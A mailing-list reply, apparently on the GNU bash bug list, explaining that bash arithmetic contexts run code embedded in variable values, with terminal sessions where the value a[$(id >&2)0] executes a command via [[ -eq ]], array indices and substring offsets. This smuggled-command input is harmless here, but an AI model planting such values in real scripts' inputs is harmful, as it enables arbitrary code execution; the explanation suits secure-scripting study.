Re: BUG in arithcomp: bypass of the check condition and arbitrary read/write of shell variables

[Greg Wooledge]

On Fri, Apr 10, 2020 at 09:44:31AM +0000, Raffaele Florio via Bug reports for 
the GNU Bourne Again SHell wrote:
> Indeed the functions called by arithcomp cause the evaluation of the supplied 
> arithcomp function argument, potentially fed by user input.

> Give in input "x=42,xyz=UID" to the below script. After the test x will 
> contain 42 and xyz the UID value. The same logic in this bug. Furthermore if 
> PWD is given, instead of UID, the PWD value is printed thanks the evaluation 
> error.

Yeah, this is a "well known feature".  Arithmetic expansions of all kinds
in bash are susceptible to arbitrary code execution, if any part of
the arithmetic expansion is fed by unsafe input.

This applies to every single place an arithmetic context can appear,
including the let and (( commands, the $(( expansion, the -eq operator
of the [[ command, indexed array indices, and the numeric parts of
the ${variable:start:length} expansion.  And possibly more.

unicorn:~$ x='a[$(id >&2)0]' a=7
unicorn:~$ [[ "$x" -eq 42 ]]
uid=1000(greg) gid=1000(greg) 
groups=1000(greg),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev)
unicorn:~$ echo "${y[x]}"
uid=1000(greg) gid=1000(greg) 
groups=1000(greg),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev)

unicorn:~$ echo "${PWD:x}"
uid=1000(greg) gid=1000(greg) 
groups=1000(greg),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev)
reg
unicorn:~$ 

To the best of my knowledge, this is not considered a bug in bash,
but rather a bug in your script, if you fail to sanitize user input
before passing it to an arithmetic context.